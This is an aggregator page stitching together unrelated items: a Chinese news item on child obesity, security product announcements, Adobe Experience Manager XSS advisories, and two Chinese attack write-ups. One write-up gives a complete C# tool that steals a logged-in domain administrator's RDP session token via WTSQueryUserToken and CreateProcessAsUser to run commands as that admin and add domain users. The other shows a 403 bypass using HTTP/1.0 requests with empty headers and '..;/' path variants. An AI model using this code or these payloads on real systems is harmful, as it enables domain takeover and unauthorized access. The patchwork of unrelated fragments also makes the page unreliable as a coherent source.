Aggregator

漏洞已修复

速修复

根据联合国儿童基金会和北京大学的数据，中国超重与肥胖儿童的比例自 2000 年以来增加了三倍。如果目前的趋势继续下去，预计到 2030 年时这个比例将超过 60%。超重儿童长大后更可能变成超重或肥胖的成年人，使他们患上心血管疾病、糖尿病和某些癌症的风险更高。官媒称，超过一半的中国成年人已经超重。“美国人口中近 70% 的人超重。但很快中国可能就会赶上来，”美国外交关系委员会全球卫生高级研究园黄严忠教授说。他表示，“快速的城市化进程提供了更多久坐不动的生活方式。”有理论认为，中国从前出现饥荒的遭遇可能产生了持久的影响。“一项研究表明，中国过去的食物短缺实际上导致了代谢和表观遗传的变化，这些变化对后代的肥胖风险产生影响，并使他们更多的接触到高热量饮食，”他强调这个假设“很难最终证明”，需要更多的研究。

微软12月补丁日多个产品安全漏洞风险通告：1个在野利用、17个紧急漏洞

前言

当域内管理员登录过攻击者可控的域内普通机器运维或者排查结束后，退出3389时没有退出账号而是直接关掉了远程桌面，那么会产生哪些风险呢？有些读者第一个想到的肯定就是抓密码，但是如果抓不到明文密码又或者无法pth呢？

通过计划任务完成域内提权

首先模拟域管登录了攻击者可控的普通域内机器并且关掉了3389远程桌面：

然后攻击者可以通过如下方式进行域内提权，已添加域内用户为例，流程为新建计划任务-选择域管用户-执行命令：

选择搜索用户位置为域内：

选择登录进来的域管用户：

设置启动的命令：

然后运行计划任务，可以看到成功添加了域内用户：

有些读者可能会问了，那是不是选择任意域内用户都行，实际上是不行的，会提示用户未登录：

原理分析

原理实际上也很简单，就是获取进程的token，然后利用CreateProcessAsUser api完成模拟用户token进行进程创建即可。下面提供完整代码,如下代码核心是利用WTSQueryUserToken获取rdp session id token，然后使用CreateProcessAsUser完成进程的创建：

using System;
using System.Runtime.InteropServices;
using System.ComponentModel;
using System.Security.Principal;

class Program
{
   [DllImport("wtsapi32.dll", SetLastError = true)]
   static extern bool WTSQueryUserToken(int sessionId, out IntPtr Token);

   [DllImport("kernel32.dll", SetLastError = true)]
   static extern bool CloseHandle(IntPtr hObject);

   [DllImport("userenv.dll", SetLastError = true)]
   static extern bool CreateEnvironmentBlock(out IntPtr lpEnvironment, IntPtr hToken, bool bInherit);

   [DllImport("userenv.dll", SetLastError = true)]
   static extern bool DestroyEnvironmentBlock(IntPtr lpEnvironment);

   [DllImport("advapi32.dll", SetLastError = true)]
   static extern bool CreateProcessAsUser(
       IntPtr hToken,
       string lpApplicationName,
       string lpCommandLine,
       IntPtr lpProcessAttributes,
       IntPtr lpThreadAttributes,
       bool bInheritHandles,
       uint dwCreationFlags,
       IntPtr lpEnvironment,
       string lpCurrentDirectory,
       ref STARTUPINFO lpStartupInfo,
       out PROCESS_INFORMATION lpProcessInformation);

   [StructLayout(LayoutKind.Sequential)]
   struct STARTUPINFO
   {
       public int cb;
       public string lpReserved;
       public string lpDesktop;
       public string lpTitle;
       public uint dwX;
       public uint dwY;
       public uint dwXSize;
       public uint dwYSize;
       public uint dwXCountChars;
       public uint dwYCountChars;
       public uint dwFillAttribute;
       public uint dwFlags;
       public short wShowWindow;
       public short cbReserved2;
       public IntPtr lpReserved2;
       public IntPtr hStdInput;
       public IntPtr hStdOutput;
       public IntPtr hStdError;
   }

   [StructLayout(LayoutKind.Sequential)]
   struct PROCESS_INFORMATION
   {
       public IntPtr hProcess;
       public IntPtr hThread;
       public uint dwProcessId;
       public uint dwThreadId;
   }

   static void Main(string[] args)
   {
       if (args.Length < 2)
       {
           Console.WriteLine("Usage: RdpProcessLauncher.exe <sessionId> <command>");
           return;
       }

       int sessionId;
       if (!int.TryParse(args[0], out sessionId))
       {
           Console.WriteLine("Invalid session ID");
           return;
       }

       string command = args[1];
       IntPtr userToken = IntPtr.Zero;
       IntPtr envBlock = IntPtr.Zero;

       try
       {
           // Get user token for the specified session
           bool tokenResult = WTSQueryUserToken(sessionId, out userToken);
           if (!tokenResult)
           {
               int error = Marshal.GetLastWin32Error();
               throw new Win32Exception(error);
           }

           // Create environment block
           bool envResult = CreateEnvironmentBlock(out envBlock, userToken, false);
           if (!envResult)
           {
               int error = Marshal.GetLastWin32Error();
               throw new Win32Exception(error);
           }

           // Prepare startup info
           STARTUPINFO startupInfo = new STARTUPINFO();
           startupInfo.cb = Marshal.SizeOf(startupInfo);
           startupInfo.lpDesktop = "winsta0\\default";

           PROCESS_INFORMATION processInfo = new PROCESS_INFORMATION();

           // Create process as user
           bool processResult = CreateProcessAsUser(
               userToken,
               null,
               command,
               IntPtr.Zero,
               IntPtr.Zero,
               false,
               0x00000400, // CREATE_UNICODE_ENVIRONMENT
               envBlock,
               null,
               ref startupInfo,
               out processInfo);

           if (!processResult)
           {
               int error = Marshal.GetLastWin32Error();
               throw new Win32Exception(error);
           }

           Console.WriteLine("Process launched successfully. PID: {0}", processInfo.dwProcessId);

           // Clean up process handles
           CloseHandle(processInfo.hProcess);
           CloseHandle(processInfo.hThread);
       }
       catch (Exception ex)
       {
           Console.WriteLine("Error: {0}", ex.Message);
       }
       finally
       {
           // Clean up resources
           if (envBlock != IntPtr.Zero)
           {
               DestroyEnvironmentBlock(envBlock);
           }
           if (userToken != IntPtr.Zero)
           {
               CloseHandle(userToken);
           }
       }
   }
}

编译后进行尝试：

成功完成了token窃取并添加了域内用户。

总结

本文通过演示窃取RDP Session Token完成域内提权的目的。

  

Кибершпионы всё глубже внедряются в ключевые звенья глобальной инфраструктуры.

Picus Security announced new innovations to its Attack Path Validation (APV) product. The new Picus APV now offers security teams accurate, risk-free, and continuous automated penetration testing to uncover critical risks, while significantly reducing business disruptions and time spent on threat research. Combined with its Breach and Attack Simulation technology, Picus provides a comprehensive approach to Adversarial Exposure Validation for enterprise organizations. By pairing evasive automated penetration testing alongside attack path-mapping capabilities, Picus allows users … More →

The post Picus provides automated pentesting testing to help uncover critical risks appeared first on Help Net Security.

优质内容稿费2000元起。

Patch Tuesday Update – December 2024

Learn A New Language With Advanced AI

Code Smell 283 - Unresolved Meta Tags

With the introduction of Cato IoT/OT Security, Cato Networks is enabling enterprises to simplify the management and security of Internet of Things (IoT) and operational technology (OT) devices. Cato IoT/OT Security converges device discovery and classification, policy enforcement, and threat prevention in a SASE platform. Cato IoT/OT Security is a native feature in the Cato SASE Cloud Platform, which allows enterprises to instantly activate the new solution with a click of a button. There is … More →

The post Cato Networks extends SASE-based protection to IoT/OT environments appeared first on Help Net Security.

The multi-cloud data warehousing platform said it will completely phase out single factor authentication with passwords by November 2025

Linux UEFI BootKit样本分析

一种绕过403的新技术，跟大家分享一下。研究HTTP协议已经有一段时间了。发现HTTP协议的1.0版本可以绕过403。于是开始对lyncdiscover.microsoft.com域做FUZZ，并且发现了几个403Forbidden的文件。

（访问fsip.svc为403）

在经过尝试后，得出一个结论：当清除所有header头的值时，服务器会对客户端作出响应。

结论1：

将HTTP协议版本更改为1.0，而且不要在标题中设置任何值。

结论2：

如果服务器和任何其他安全机制没有以正确的方式配置，不把Host放在header头内时，服务器将会自己把目标地址放在header中，这会导致服务器将我们的请求认做本地请求。

（访问fsip.svc为200）

用同样的方式尝试了另一个文件，并且再次成功bypass。

（403）

（200）

还要补充一点：你也可以用同样的方式去绕过CDN获取服务器IP。

例如：

如你所见，在Location中，它在返回中显示了域本身的地址。

再次使用相同的方法并发送请求时，显示了服务器的主地址。

以上技术已经被添加到burp工具当中：

https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122

------------------------------

以上这种思路虽然已经被添加到了burp插件，但我们依旧需要去学习了解插件运行背后的逻辑，而不只是当一个脚本小子。

尤其是在做黑盒测试中，秉持改变原有数据结构的FUZZ思路进行一切可能的尝试，才会挖掘出更有趣的漏洞。

在burp权限绕过插件中，除了以上尝试，还有诸多修改url请求的尝试，例如：

https://www.example.com..;/api/v1/users
https://www.example.com/api..;/v1/users
https://www.example.com/api/v1..;/users

这些尝试本质也是在破坏数据原有结构，利用后端，服务器等处理特性实现绕过。

其实除此外还可以进行任何可能的尝试：https://www.example.com/api/v1/users

例如将v1改成v2，利用通配符代替数字，或者添加多余的字符串等等操作。

  

A vulnerability was found in Adobe Experience Manager up to 6.5.21 and classified as problematic. Affected by this issue is some unknown functionality of the component Form Field Handler. The manipulation leads to cross site scripting. This vulnerability is handled as CVE-2024-43730. The attack may be launched remotely. There is no exploit available. It is recommended to upgrade the affected component.

A vulnerability classified as problematic was found in Adobe Experience Manager up to 6.5.21. This vulnerability affects unknown code of the component Form Field Handler. The manipulation leads to cross site scripting. This vulnerability was named CVE-2024-43725. The attack can be initiated remotely. There is no exploit available. It is recommended to upgrade the affected component.

A vulnerability, which was classified as problematic, has been found in Adobe Experience Manager up to 6.5.21. This issue affects some unknown processing of the component Form Field Handler. The manipulation leads to cross site scripting. The identification of this vulnerability is CVE-2024-43726. The attack may be initiated remotely. There is no exploit available. It is recommended to upgrade the affected component.

A vulnerability, which was classified as problematic, was found in Adobe Experience Manager up to 6.5.21. Affected is an unknown function of the component Form Field Handler. The manipulation leads to cross site scripting. This vulnerability is traded as CVE-2024-43727. It is possible to launch the attack remotely. There is no exploit available. It is recommended to upgrade the affected component.

A vulnerability has been found in Adobe Experience Manager up to 6.5.21 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Form Field Handler. The manipulation leads to cross site scripting. This vulnerability is known as CVE-2024-43728. The attack can be launched remotely. There is no exploit available. It is recommended to upgrade the affected component.